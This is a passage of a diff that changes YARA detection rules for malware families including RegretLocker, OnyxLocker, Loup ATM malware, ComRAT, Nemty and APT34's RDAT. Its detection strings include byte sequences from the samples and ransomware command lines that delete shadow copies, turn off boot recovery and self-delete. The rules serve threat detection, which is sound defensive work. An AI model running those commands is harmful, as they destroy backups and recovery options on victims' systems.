-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-26/Moriya/MAL_Moriya_May_2021_1.yara#L1-L27"
+		id = "7a7c3952-fa6e-5643-a40f-d2e466b8c2a2"
+		date = "2020-10-03"
+		modified = "2020-10-04"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-03/Chimera/APT_Chimera_Sept_2020_1.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "f73049f261428c8921a2c8a86fb5d242719e5dc9f30a5c58e86be1a79d84a42d"
+		logic_hash = "8fdb34c793534f8632fd2c35b89462d4a736a31f2347e7bab3e8bcebff04c21f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "3eda93de4a1e7a35c040fad914a4885d079ffc3c1362153b74e10ff9121de22b"
-		hash2 = "d620f9c32adc39b0632f22ec6a0503bf906fd1357f4435463fbb4b422634a536"
-		tlp = "White"
-		adversary = "Chinese APT Group"
+		hash1 = "f6d89ff139f4169e8a67332a0fd55b6c9beda0b619b1332ddc07d9a860558bab"
 
 	strings:
-		$seq1 = { 4c 8d 05 13 10 00 00 ff 15 95 12 00 00 48 8d 15 36 10 00 00 48 8d 4d c0 ff 15 fc 12 00 00 48 8d 15 65 10 00 00 48 8d 4d d0 ff 15 eb 12 00 00 48 8d 05 cc 23 00 00 41 b9 22 00 00 00 48 89 44 24 30 4c 8d 45 c0 c6 44 24 28 00 33 d2 83 64 24 20 00 48 8b cb ff 15 f0 11 00 00 33 d2 41 8b ce 8b f8 85 c0 79 09 4c 8d 05 6e }
-		$seq2 = { 4c 8d 05 85 10 00 00 ff 15 27 12 00 00 48 8b 05 80 23 00 00 48 8d 55 c0 48 8d 4d d0 83 48 30 04 ff 15 be 11 00 00 e8 c5 01 00 00 33 d2 41 8b ce 85 c0 79 0c }
-		$seq3 = { 33 db 48 8b 74 24 30 4c 8b 7c 24 38 48 8b 7c 24 40 4c 8b 64 24 48 4d 8b ec 48 8d 4c 24 58 ff 15 b7 1c 00 00 48 8b 46 10 49 89 44 24 f8 48 8b 46 08 49 89 45 f0 41 80 65 bb 0f 8a 46 18 24 0f 41 08 45 bb 4c 8b 4e 08 }
-		$seq4 = { 48 83 64 24 58 00 ba 44 5c 00 00 c7 44 24 50 79 00 00 00 41 b9 76 00 00 00 c7 44 24 48 78 6f 00 00 41 b8 69 72 00 00 c7 44 24 40 72 70 00 00 c7 44 24 38 69 00 00 00 c7 44 24 30 73 6e 00 00 c7 44 24 28 5c 00 00 00 c7 44 24 20 72 65 00 00 e8 03 f6 ff ff 48 8d 55 80 48 8d 4c 24 70 ff 15 74 17 00 00 48 8d 05 2d 28 00 00 45 33 c9 48 89 44 24 38 45 33 c0 48 8b 05 eb 16 00 00 48 83 64 24 30 00 c6 44 24 28 00 41 8d 51 40 48 8b 08 48 89 4c 24 20 48 8d 4c 24 70 ff 15 d9 16 00 00 85 c0 78 31 48 8b 0d ee 27 00 00 48 8b 81 e0 00 00 00 48 89 05 d8 27 00 00 48 8d 05 19 f7 ff ff 87 81 e0 00 00 00 48 8b 0d cc 27 00 00 ff 15 c6 16 00 00 33 c0 48 8b 4d 00 48 33 cc e8 58 0b 00 00 48 81 c4 10 01 00 }
-		$seq5 = { 40 55 53 56 57 41 56 48 8d ac 24 40 ff ff ff 48 81 ec c0 01 00 00 48 8b 05 47 1e 00 00 48 33 c4 48 89 85 b8 00 00 00 48 83 64 24 38 00 49 8b d8 48 83 64 24 50 00 48 8b fa 48 8b f1 33 d2 41 b8 c8 00 00 00 48 8d 4c 24 60 4d 8b f1 e8 0b 06 00 00 33 c0 48 8d 4d 30 0f 57 c0 48 89 85 b0 00 00 00 33 d2 0f 11 85 90 00 00 00 44 8d 40 58 0f 11 85 a0 00 00 00 e8 e2 05 00 00 0f 10 07 48 83 64 24 20 00 48 8d 05 72 f8 ff ff 48 89 44 24 40 48 8d 54 24 28 48 8d 05 81 fd ff ff 4d 8b c6 48 8b cb 48 89 44 24 48 f3 0f 7f 44 24 28 e8 13 05 00 00 8b d8 85 c0 0f 88 da 00 00 00 0f 10 07 48 8b 0d f7 1f 00 00 48 8d 05 30 0a 00 00 45 33 c9 48 89 45 40 f3 0f 7f 45 30 45 33 c0 48 8d 55 30 0f 10 06 48 89 45 48 f3 0f 7f 45 70 e8 22 05 00 00 8b d8 85 c0 0f 88 93 00 00 00 0f 10 06 83 65 c0 00 48 8d 05 14 0a 00 00 0f 10 0d 5d 0f 00 00 83 a5 a0 00 00 00 00 48 8d 54 24 60 48 8b 0d 9a 1f 00 00 45 33 c9 f3 0f 7f 45 a0 48 89 44 24 70 45 33 c0 0f 10 07 48 89 44 24 78 48 8d 85 90 00 00 00 48 89 45 d8 48 8d 44 24 20 f3 0f 7f 45 e4 c7 45 e0 03 50 00 00 0f 10 05 ff 0e 00 00 c7 45 d0 01 00 00 00 f3 0f 7f 8d 90 00 00 00 c7 85 a8 00 00 00 00 01 00 00 f3 0f 7f 45 b0 48 89 85 b0 00 00 00 e8 91 04 00 00 8b d8 85 c0 79 08 41 8b 0e e8 35 04 00 00 8b c3 48 8b 8d b8 00 00 00 48 33 cc e8 96 02 00 00 48 81 c4 c0 01 00 00 41 5e 5f 5e 5b }
-		$s1 = "Moriya : NotifyFunction\n" fullword ascii
-		$s2 = "Moriya Filter" fullword wide
-		$s3 = "Moriya : DeviceControlDispatch!\n" fullword ascii
-		$s4 = "Moriya : Waiting...\n" fullword ascii
-		$s5 = "Moriya : WriteDispatch!\n" fullword ascii
-		$s6 = { 5c 00 44 00 65 00 76 00 69 00 63 00 65 00 5c 00 4d 00 6f 00 72 00 69 00 79 00 61 00 53 00 74 00 72 00 65 00 61 00 6d 00 57 00 61 00 74 00 63 00 68 00 6d 00 65 00 6e }
-		$s7 = { 5c 00 44 00 6f 00 73 00 44 00 65 00 76 00 69 00 63 00 65 00 73 00 5c 00 4d 00 6f 00 72 00 69 00 79 00 61 00 53 00 74 00 72 00 65 00 61 00 6d 00 57 00 61 00 74 00 63 00 68 00 6d 00 65 00 6e }
-		$s8 = "Moriya start\n" fullword ascii
+		$header = { 4D 5A 41 52 55 48 89 E5 48 83 EC 20 48 83 E4 F0 E8 00 00 00 00 5B 48 81 C3 EB 18 00 00 FF D3 48 81 C3 00 09 03 00 49 89 D8 6A 04 5A FF D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 }
+		$s1 = "\\\\%s\\pipe\\%s" fullword ascii
+		$s2 = "%04x-%04x:%s" fullword wide
+		$core1 = "core_pivot_session_new" fullword ascii
+		$core2 = "core_pivot_session_died" fullword ascii
+		$core3 = "core_pivot_remove" fullword ascii
+		$core4 = "core_pivot_add" fullword ascii
+		$lib1 = "CreateNamedPipeA" fullword ascii
+		$lib2 = "ConnectNamedPipe" fullword ascii
+		$lib3 = "WinHttpGetIEProxyConfigForCurrentUser" fullword ascii
+		$export = "ReflectiveLoader" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 6KB and ( 3 of ( $seq* ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x4a5d and filesize > 30KB and $header and 1 of ( $s* ) and 2 of ( $core* ) and 2 of ( $lib* ) and $export
 }
-rule ARKBIRD_SOLG_APT_Turla_Comrat_Chinch_V4_Jan_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Regretlocker_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect ComRAT V4 (Chinch) used by APT Turla group"
+		description = "Detect RegretLocker ransomware"
 		author = "Arkbird_SOLG"
-		id = "7d4daf3d-eed9-59fb-a4b9-fbc1c72adfcd"
-		date = "2021-01-23"
-		modified = "2021-01-26"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-23/Turla/APT_Turla_ComRAT_Chinch_V4_Jan_2021_1.yar#L1-L28"
+		id = "a8d58402-15e2-5d20-8d33-2e7a3f8973fd"
+		date = "2020-11-04"
+		modified = "2020-11-04"
+		reference = "https://twitter.com/VK_Intel/status/1323693700371914753"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-04/RegretLocker/Ran_RegretLocker_Oct_2020_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "0d92207c4716f8d2fbf1d4f0cf3a33c38417fdd1565c87c251f7ff290135c435"
+		logic_hash = "2c63bdcee6f2a9025d3a1f73f3a38ec58da103752b88bd3a6bf79d85d8f92e4d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "a62e1a866bc248398b6abe48fdb44f482f91d19ccd52d9447cda9bc074617d56"
+		hash1 = "a188e147ba147455ce5e3a6eb8ac1a46bdd58588de7af53d4ad542c6986491f4"
 
 	strings:
-		$com1 = "state->_reprocess_current_token || token.type != GUMBO_TOKEN_START_TAG || token.v.start_tag.attributes.data == NULL" fullword wide
-		$com2 = "fragment_ctx != GUMBO_TAG_LAST" fullword wide
-		$com3 = "has_matching_a == 1" fullword wide
-		$com4 = "ODFA: %u %d %u" fullword ascii
-		$com5 = "Custom browser path is empty." fullword ascii
-		$com6 = "Default browser path is:" fullword ascii
-		$com7 = "Search for browser path." fullword ascii
-		$com8 = "Cant retrieve any path." fullword ascii
-		$com9 = "Custom browser path is:" fullword ascii
-		$jmp1 = { 2e 64 6c 6c 00 55 4d 45 50 00 56 46 45 50 }
-		$jmp2 = { 33 c9 e9 ?? ?? ff ff cc cc cc cc cc cc cc cc cc }
-		$seq1 = { 40 55 48 8d ac 24 00 fd ff ff 48 81 ec 00 04 00 00 48 8b 05 80 46 1b 00 48 33 c4 48 89 85 d0 02 00 00 b9 d8 02 00 00 e8 f4 8b 07 00 4c 8b 0d c5 a5 1c 00 48 8d 95 00 01 00 00 4c 8b 05 af a5 1c 00 48 8d 0d c8 9d 1c 00 4d 2b c8 48 89 05 ae 8a 1d 00 e8 a9 7e fc ff 48 83 bd 18 01 00 00 10 48 8d 8d 00 01 00 00 48 0f 43 8d 00 01 00 00 ff 15 24 f3 0c 00 48 8b 15 25 f3 0c 00 48 8b c8 e8 6d 59 fb ff 48 8b 95 18 01 00 00 48 83 fa 10 }
-		$seq2 = { 41 8b 41 08 83 e8 09 83 f8 08 }
-		$seq3 = { 48 8b 03 48 8b cb ff 50 08 48 8b 95 f8 01 00 00 48 83 fa 08 72 39 48 8b 8d e0 }
-		$seq4 = { b8 09 00 00 00 44 88 a5 60 01 00 00 48 8d 8d 60 01 00 00 f3 0f 7f 85 70 01 00 00 e8 c1 19 fc ff ba df 5e ca 76 48 8d 4d 50 e8 63 ea fc ff 48 8b c8 48 8d 95 60 01 00 00 e8 c4 cb ff ff 0f b6 15 dd 8b 1c 00 48 8b c8 e8 35 cd ff ff 48 8b 95 78 01 00 00 48 83 fa 10 72 34 }
+		$seq1 = { b8 05 dd 44 00 e8 07 7d 00 00 81 ec b0 06 00 00 53 56 33 db c7 45 cc 07 00 00 00 33 c0 89 5d c8 57 66 89 45 b8 40 c7 85 7c ff ff ff 02 00 00 00 c7 45 e0 ec 4a 98 ec 8d 75 e0 c7 45 e4 f9 a0 e9 47 8d 7d 80 c7 45 e8 90 1f 71 41 c7 45 ec 5a 66 34 5b 89 45 90 89 45 b0 89 45 b4 8d 45 d0 50 a5 8d 45 b0 50 53 68 00 00 3f 00 ff 75 0c a5 8d 85 7c ff ff ff 50 89 5d fc a5 a5 e8 76 50 00 00 85 c0 74 32 ff 15 74 00 45 00 50 68 88 1b 45 00 e8 ab de ff ff 8b 75 08 8d 45 b8 59 59 88 5d f0 8b ce ff 75 f0 89 5e 10 50 89 5e 14 e8 bb 50 ff ff e9 cb 01 00 00 53 8d 45 90 50 53 6a 04 53 ff 75 d0 e8 35 50 00 00 85 c0 74 08 50 68 bc 1b 45 00 eb bd 33 c0 8d bd 4c fb ff ff b9 82 00 00 00 be 04 01 00 00 f3 ab 8d 85 4c fb ff ff 89 75 d4 50 8d 45 d4 83 cb ff 50 ff 75 d0 e8 02 50 00 00 83 65 e8 00 8d 4d d8 33 c0 6a 07 5f 66 89 45 d8 8d 85 4c fb ff ff 50 89 7d ec e8 c6 6d ff ff 6a ff 68 f4 1b 45 00 8d 4d d8 c6 45 fc 01 e8 fd e8 ff ff 83 f8 ff 74 38 83 65 a8 00 33 c9 6a ff 50 8d 45 d8 66 89 4d 98 50 8d 4d 98 89 7d ac e8 3d df ff ff 83 7d ac 08 8d 45 98 0f 43 45 98 50 e8 bc 58 02 00 59 8d 4d 98 8b d8 e8 dd 69 ff ff 56 8d 85 54 fd ff ff 50 ff 15 f0 00 45 00 8b f8 8d 85 54 fd ff ff 50 8d 4d d8 e8 57 6d ff ff 8b 4d ec 8d 45 d8 8b 55 d8 83 f9 08 8b 75 e8 0f 43 c2 66 83 7c 70 fe 5c 75 16 83 f9 08 8d 45 d8 0f 43 c2 33 c9 66 89 4c 70 fe 8b 4d ec 8b 55 d8 83 f9 08 8d 45 d8 0f 43 c2 33 c9 51 51 6a 03 51 6a 03 51 50 ff 15 dc 00 45 00 8b f0 83 fe ff 74 7e 33 c9 8d 45 d4 51 50 68 04 01 00 00 8d 85 5c ff ff ff 50 51 51 68 00 00 56 00 56 ff 15 84 01 45 00 39 9d 64 ff ff ff 75 2c 8d 45 d4 50 68 04 01 00 00 8d 85 44 f9 ff ff 50 8d 85 54 fd ff ff 50 ff 15 08 01 45 00 8d 85 44 f9 ff ff 50 8d 4d b8 e8 b1 6c ff ff 56 ff 15 a8 00 45 00 68 04 01 00 00 8d 85 54 fd ff ff 50 57 ff 15 f8 00 45 00 85 c0 0f 85 29 ff ff ff 57 ff 15 fc 00 45 00 8b 75 08 33 c0 88 45 f0 8b ce ff 75 f0 89 46 10 89 46 14 8d 45 b8 50 e8 f3 4e ff ff 8d 4d d8 e8 cb 68 ff ff 8d 4d b8 e8 c3 68 ff ff 8b 4d f4 8b c6 5f 5e 5b 64 89 0d 00 00 00 00 c9 }
+		$seq2 = { 89 7d e4 e8 d5 a9 ff ff c7 04 24 88 02 00 00 6a 40 ff 15 28 01 45 00 8b f0 c7 45 d4 88 02 00 00 8d 45 d4 89 75 e8 50 56 e8 78 1b 00 00 83 f8 6f 75 17 56 ff 15 2c 01 45 00 ff 75 d4 6a 40 ff 15 28 01 45 00 8b f0 89 45 e8 8d 45 d4 50 56 e8 52 1b 00 00 85 c0 0f 84 }
+		$com1 = "bcdedit.exe / set{ default } bootstatuspolicy ignoreallfailures" fullword ascii
+		$com2 = { 63 6d 64 2e 65 78 65 00 20 26 20 00 2f 43 20 70 69 6e 67 20 31 2e 31 2e 31 2e 31 20 2d 6e 20 31 20 2d 77 20 33 30 30 30 20 3e 20 4e 75 6c 20 26 20 44 65 6c 20 2f 66 20 2f 71 20 22 25 73 22 }
+		$com3 = "bcdedit.exe / set{ default } recoveryenabled No" fullword ascii
+		$com4 = "vssadmin.exe Delete Shadows / All / Quiet" fullword ascii
+		$com5 = "schtasks /Create /SC MINUTE /TN " fullword ascii
+		$com6 = "schtasks /Delete /TN " fullword ascii
+		$str1 = { 47 45 54 20 25 73 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 25 73 }
+		$str2 = { 50 4f 53 54 20 25 73 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 25 73 }
+		$str3 = "Content-Type: application/x-www-form-urlencoded" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 1000KB and 6 of ( $com* ) and all of ( $jmp* ) and 3 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 200KB and all of ( $seq* ) and 4 of ( $com* ) and 2 of ( $str* )
 }
-rule ARKBIRD_SOLG_RAN_Nemty_June_2021_1 : FILE
+
+rule ARKBIRD_SOLG_Mal_ATM_Loup_Aug_2020_1 : FILE
 {
 	meta:
-		description = "Detect Nemty ransomware"
+		description = "Detect ATM malware Loup by theirs strings."
 		author = "Arkbird_SOLG"
-		id = "1c7994b8-7479-5679-91a5-e3ca4b2e7fde"
-		date = "2021-06-12"
-		modified = "2021-06-13"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-12/Nemty/RAN_Nemty_June_2021_1.yara#L1-L19"
+		id = "07c0fe02-a82a-58a7-8776-748a1c986f93"
+		date = "2020-08-17"
+		modified = "2020-08-18"
+		reference = "https://twitter.com/r3c0nst/status/1295275546780327936"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-17/Loup/Mal_ATM_Loup_Aug_2020_1.yar#L3-L34"
 		license_url = "N/A"
-		logic_hash = "25a9e82ae1e950e1c71d6dfa120efd1a2ba39cbf8e9c2cd4ba4e67ce7dabc45e"
+		logic_hash = "18e4d6af5d89746b42c87d7311e442f61deff3bfcbf57cc008d87290e91baafb"
+		score = 75
+		quality = 67
+		tags = "FILE"
+		hash1 = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196"
+
+	strings:
+		$pdb1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" fullword ascii
+		$pdb2 = "PDBOpenValidate5" fullword ascii
+		$dbg1 = "Run-Time Check Failure #%d - %s" fullword ascii
+		$dbg2 = "Unknown Filename" fullword ascii
+		$dbg3 = "Unknown Module Name" fullword ascii
+		$info1 = "%s%s%p%s%zd%s%d%s%s%s%s%s" fullword ascii
+		$info2 = { 41 64 64 72 65 73 73 3a 20 30 78 }
+		$info3 = { 53 69 7a 65 3a }
+		$info4 = { 44 61 74 61 3a }
+		$s1 = "MSXFS.dll" fullword ascii
+		$s2 = "WFSExecute" fullword ascii
+		$s3 = "WfsVersion" fullword ascii
+		$s4 = "SvcVersion" fullword ascii
+		$s5 = "SpiVersion" fullword ascii
+		$s6 = "CurrencyDispenser1" fullword ascii
+		$s7 = "WFSUnlock" fullword ascii
+		$s8 = "WFSFreeResult" fullword ascii
+		$s9 = "WFSCleanUp" fullword ascii
+		$s10 = "WFSOpen" fullword ascii
+		$s11 = "WFSClose" fullword ascii
+		$s12 = "WFSStartUp" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( pe.imphash ( ) == "190fc01f66c40478aa91be89a98c57e9" and ( 1 of ( $pdb* ) and 2 of ( $dbg* ) and 2 of ( $info* ) and 9 of ( $s* ) ) )
+}
+rule ARKBIRD_SOLG_Ran_Onyxlocker_Nov_2020_1 : FILE
+{
+	meta:
+		description = "Detect OnyxLocker ransomware"
+		author = "Arkbird_SOLG"
+		id = "bb7d914c-a074-5d79-a5d2-43c5a0adf49e"
+		date = "2020-11-18"
+		modified = "2020-11-18"
+		reference = "https://twitter.com/Kangxiaopao/status/1328614320016560128"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-18/OnyxLocker/Ran_OnyxLocker_Nov_2020_1.yar#L1-L27"
+		license_url = "N/A"
+		logic_hash = "1ccca1040acee5bb937fd5ebb3536f8c644d3586229d01457d780bef5fcb57a1"
+		score = 75
+		quality = 71
+		tags = "FILE"
+		hash1 = "7e3c97d3d274b5f7fedad6e392e6576ac3e5724ddd7e48c58a654b6b95eb40d7"
+
+	strings:
+		$s1 = "IEncryptionProvider" fullword ascii
+		$s2 = "OnyxLocker.exe" fullword wide
+		$s3 = "GetEncryptionThreads" fullword ascii
+		$s4 = "CreateEncryptionKey" fullword ascii
+		$s5 = ".NETFramework,Version=v4.5.2" fullword ascii
+		$s6 = "get_TargetFiles" fullword ascii
+		$s7 = "IsTargetFile" fullword ascii
+		$s8 = "<TargetFiles>k__BackingField" fullword ascii
+		$s9 = "XxteaEncryptionProvider" fullword ascii
+		$s10 = "GetStartingFolders" fullword ascii
+		$s11 = "<EncryptionKey>k__BackingField" fullword ascii
+		$s12 = "RECOVERY INSTRUCTIONS" fullword wide
+		$s13 = "$182eaa96-fcb2-458b-85cb-a9b8da57ae71" fullword ascii
+		$s14 = ".NET Framework 4.5.2" fullword ascii
+		$s15 = "TraverseDirectories" fullword ascii
+		$s16 = "{0} {1}" fullword wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 8KB and 8 of them
+}
+rule ARKBIRD_SOLG_APT_APT34_RDAT_July_2021_1 : FILE
+{
+	meta:
+		description = "Detect RDAT used by APT34"
+		author = "Arkbird_SOLG"
+		id = "136f8a9e-e680-5fab-8113-b4d33a47bc34"
+		date = "2021-07-15"
+		modified = "2021-07-16"
+		reference = "https://twitter.com/ShadowChasing1/status/1415206437806960647"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-15/APT34/APT_APT34_RDAT_July_2021_1.yara#L1-L22"
+		license_url = "N/A"
+		logic_hash = "269788430ca8faff4b0ea5ec7c2a62f99f5f48ef3bc4ea3f7a27f1d735e64819"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "45e35c9b095871fbc9b85afff4e79dd36b7812b96a302e1ccc65ce7668667fe6"
-		hash2 = "511fee839098dfa28dd859ffd3ece5148be13bfb83baa807ed7cac2200103390"
-		hash3 = "74b7a1da50ce44b640d84422bb3f99e2f338cc5d5be9ef5f1ad03c8e947296c3"
-		tlp = "white"
-		adversary = "RAAS"
+		hash1 = "b59dea96ef94e8d32ee1a1805174318643569bbdca0d7569ede19467ff09dcdc"
+		hash2 = "65a6afc027ff851bd325d8a4f2ab4f326dd8f2c230bfd49a213c5afc00df8e2c"
+		hash3 = "f9f6dbb09773f708b125a4cca509047eb33c8c53d9e15a8c41ae3d7a8c3e5c7c"
+		tlp = "White"
+		adversary = "APT34"
 
 	strings:
-		$s1 = { 83 f8 1a 0f 8d [2] 00 00 [0-1] 89 4c 24 [1-2] 89 54 24 [1-2] 89 ?? 24 [1-15] 00 00 00}
-		$s2 = { 5a 4c 49 42 00 00 00 00 00 00 01 ?? 78 01 54 8f [3] 40 [2] cf }
-		$s3 = { 4c 24 [1-2] 89 54 24 [1-2] 89 ?? 24 [12-25] 00 81 }
-		$s4 = { ff ff [0-1] 8d 05 [3] 00 [0-1] 89 04 24 [0-1] c7 44 24 ?? 02 00 00 00 e8 [2] ff ff e8 [2] ff ff [0-1] 8b 4c 24 }
+		$s1 = { 0a 6f 70 74 20 25 6c 75 28 25 6c 75 29 20 73 74 61 74 20 25 6c 75 28 25 6c 75 29 20 73 74 6f 72 65 64 20 25 6c 75 20 6c 69 74 20 25 75 20 64 69 73 74 20 25 75 }
+		$s2 = { 0a 6c 61 73 74 5f 6c 69 74 20 25 75 2c 20 6c 61 73 74 5f 64 69 73 74 20 25 75 2c 20 69 6e 20 25 6c 64 2c 20 6f 75 74 20 7e 25 6c 64 28 25 6c 64 25 25 29 }
+		$s3 = { 70 65 6e 53 43 4d 61 6e 61 67 65 72 20 66 61 69 6c 65 64 20 28 25 64 29 0a }
+		$s4 = { 43 72 65 61 74 65 53 65 72 76 69 63 65 20 66 61 69 6c 65 64 20 28 25 64 29 0a 00 00 00 00 00 00 53 65 72 76 69 63 65 20 69 6e 73 74 61 6c 6c 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 0a }
+		$s5 = { 49 8b cd ff 15 56 22 07 00 c6 05 87 7b 0a 00 00 c7 05 81 7b 0a 00 60 ea 00 00 49 83 c9 ff 45 33 c0 48 8d 55 20 48 8d 0d f3 7b 0a 00 e8 26 a4 ff ff 49 83 c9 ff 45 33 c0 48 8d 55 00 48 8d 0d bc 7b 0a 00 e8 0f a4 ff ff 41 b8 07 00 00 00 48 8d 15 92 b8 08 00 48 8d 0d 03 7c 0a 00 e8 16 a3 ff ff 49 83 c9 ff 45 33 c0 48 8d 55 40 48 8d 0d 6c 7b 0a 00 e8 df a3 ff ff 41 b8 ?? 00 00 00 48 8d 15 6a b8 08 00 48 8d 0d 13 7c 0a 00 e8 e6 a2 ff ff 48 8d 1d 0f 7d 0a 00 48 8b c3 48 83 3d 1c 7d 0a 00 08 48 0f 43 05 fc 7c 0a 00 48 89 44 24 58 48 8d 05 a0 03 00 00 48 89 44 24 60 48 89 7c 24 68 48 89 7c 24 70 48 8d 4c 24 58 ff 15 4e 21 07 00 85 c0 75 29 48 83 3d e2 7c 0a 00 08 48 0f 43 1d c2 7c 0a 00 48 8b d3 33 c9 ff 15 37 21 07 00 48 85 c0 74 09 48 8b c8 ff 15 f1 20 07 00 83 7c 24 30 02 7f 5d 48 8d 44 24 48 48 89 44 24 28 89 7c 24 20 45 33 c9 4c 8d 05 0a 71 ff ff 33 d2 33 c9 ff 15 60 22 07 00 48 8d 44 24 50 48 89 44 24 28 89 7c 24 20 45 33 c9 4c 8d 05 a8 95 ff ff 33 d2 33 c9 ff 15 3e 22 07 00 83 ca ff 48 8b c8 ff 15 f2 20 07 00 b9 64 00 00 00 ff 15 47 22 07 }
+		$s6 = { 48 89 7d f0 48 89 7d f8 45 33 c0 33 d2 48 8d 4d e0 e8 43 a7 ff ff 41 b8 2c 00 00 00 48 8d 15 be bc 08 00 48 8d 4d e0 e8 ad a7 ff ff 48 89 7d 70 48 89 7d 78 45 33 c0 33 d2 48 8d 4d 60 e8 17 a7 ff ff 45 33 c0 48 8d 15 77 94 08 00 48 8d 4d 60 e8 84 a7 ff ff 83 7c 24 30 02 75 6e 48 8d 85 a8 00 00 00 48 89 85 a0 00 00 00 41 b8 03 00 00 00 49 8b 55 08 48 8d 8d a0 00 00 00 e8 c9 0a 00 00 48 8b 95 a0 00 00 00 48 8d 4d a0 e8 89 a5 ff ff 48 8d 85 a8 00 00 00 48 8b 8d a0 00 00 48 89 85 b0 10 00 00 48 8b da 48 8b f9 33 f6 89 74 24 78 c7 45 80 18 00 00 00 c7 45 90 01 00 00 00 48 89 75 88 45 33 c9 4c 8d 45 80 48 8d 54 24 68 48 8d 4c 24 60 ff 15 81 fe 06 00 45 33 c0 8d 56 01 48 8b 4c 24 60 ff 15 68 fe 06 00 45 33 c9 4c 8d 45 80 48 8d 54 24 70 48 8d 4c 24 58 ff 15 59 fe 06 00 45 33 c0 8d 56 01 48 8b 4c 24 58 ff 15 40 fe 06 00 33 c0 48 89 45 98 48 89 45 a0 48 89 45 a8 33 d2 44 8d 46 68 48 8d 4d c0 e8 ab 89 04 00 c7 45 c0 68 00 00 00 48 8b 44 24 68 48 89 45 20 48 8b 44 24 70 48 89 45 18 81 4d fc 00 01 00 00 48 8b d3 48 8d 4d 30 e8 bf fe ff ff 90 4c 8b c0 48 8d 8d 90 00 00 00 e8 9f 0d 00 00 90 45 33 c0 b2 01 48 8d 4d 30 e8 d0 7d ff ff 48 8d 95 90 00 00 00 48 83 bd a8 00 00 00 08 48 0f 43 95 90 00 00 00 48 8d 45 98 48 89 44 24 48 48 8d 45 c0 48 89 44 24 40 48 89 74 24 38 48 89 74 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 a7 fd 06 00 48 8b 4c 24 68 ff 15 94 fd 06 00 48 8b 4c 24 70 ff 15 89 fd 06 00 48 89 b5 80 00 00 00 48 89 b5 88 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 500KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Netfilter_Dropper_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Skinnyboy_Implant_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect the dropper of Netfilter rootkit"
+		description = "Detect SkinnyBoy Implant"
 		author = "Arkbird_SOLG"
-		id = "5e67c99c-6b08-5190-9c8a-55086c20923e"
-		date = "2020-06-18"
-		modified = "2021-06-18"
-		reference = "https://twitter.com/struppigel/status/1405483373280235520"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-18/Netfilter/MAL_Netfilter_Dropper_Jun_2021_1.yara#L1-L20"
+		id = "2c78e0f3-a0b3-56fb-b4d2-313c03f1331b"
+		date = "2021-06-05"
+		modified = "2021-06-06"
+		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Implant_Jun_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "66e96304e097a0f6cd99cf77b20f61b8a0bcceaf8685a336c039a80947a08f78"
+		logic_hash = "37d6b03adaad0a97e91a366d8e5ce47bc0eb77263849422129edf9df28d25bd8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac"
-		hash2 = "659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9"
-		hash3 = "d0a03a8905c4f695843bc4e9f2dd062b8fd7b0b00103236b5187ff3730750540"
+		hash1 = "ae0bc3358fef0ca2a103e694aa556f55a3fed4e98ba57d16f5ae7ad4ad583698"
 		tlp = "White"
-		adversary = "Chinese APT Group"
+		adversary = "APT28"
 
 	strings:
